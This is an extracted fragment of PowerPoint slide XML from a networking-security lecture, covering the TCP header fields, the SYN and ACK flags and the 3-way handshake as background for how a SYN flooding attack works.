                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530588" y="947294"/>
            <a:ext cx="7061927" cy="4178633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46837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0" name="Shape 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693248" y="948543"/>
            <a:ext cx="5250352" cy="511866"/>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SYN flooding attack works on TCP server</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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="682230" y="1688503"/>
            <a:ext cx="8270995" cy="139406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indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP connection start with __?___ protocol:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      -- 3-way handshake protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      -- it establishes the connection between client and server            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      -- SYN flooding attack is to prevent client from completing this protocol   	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310800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38098"/>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Review on TCP Packet Header </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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Shape 126"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="175263" y="964160"/>
            <a:ext cx="5009824" cy="2720792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Shape 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156225" y="1101420"/>
            <a:ext cx="3930900" cy="3112361"/>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dirty="0"/>
              <a:t>TCP Segment: TCP Header + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0"/>
              <a:t>Source and Destination port (16 bits each)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>  sample server port #.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>: 23; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>: 22; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>: 80; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>: 443 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0"/>
              <a:t>Sequence number (32 bits) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>To sort packets from sender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> Initial packet has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>#=random</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255275" y="3638314"/>
            <a:ext cx="4849800" cy="15315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i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acknowledgement number (32 bits)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-69850">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acknowledge number=100:   This tells the sender  “I want to receive your next packet with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> # 100”. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107680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Flag bits(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>URG | ACK | PSH | RST | SYN | FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1163128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> indicates that it is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> packet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) in TCP connection  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN=1 &amp; ACK=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> indicates it is the reply (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN-ACK packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) to SYN packet</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148823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TCP 3-way Handshake Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3828825" y="1076034"/>
            <a:ext cx="5003475" cy="3817699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>SYN Packet: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>client sends SYN packet to server with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>purely random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t># x.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>SYN-ACK Packet:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="0" indent="-285750" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>server replies with the SYN-ACK packet having a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>purely random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> # y.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>ACK Packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="0" indent="-285750">
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Client sends out ACK packet to conclude the handshake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33" y="1354880"/>
            <a:ext cx="3104493" cy="2910798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351883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6" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6665035" y="3385272"/>
            <a:ext cx="2084260" cy="1336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5" name="Shape 14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TCP 3-way Handshake Protocol (more details) </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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390641" y="1355154"/>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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674445" y="1343100"/>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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013076" y="2473485"/>
            <a:ext cx="1901163" cy="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81468" y="2126759"/>
            <a:ext cx="1138066" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053645" y="3342932"/>
            <a:ext cx="1901163" cy="657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9185" y="3030194"/>
            <a:ext cx="2215828" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=y, ACK=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067902" y="4212379"/>
            <a:ext cx="1901163" cy="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69224" y="3899641"/>
            <a:ext cx="1839758" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>ACK=y+1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5173930" y="1603508"/>
            <a:ext cx="3644443" cy="1420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3368152" y="2040405"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092707" y="1844159"/>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sIP4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784533" y="1832099"/>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sIP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport3</a:t>
            </a:r>
          </a:p>
          <a:p>
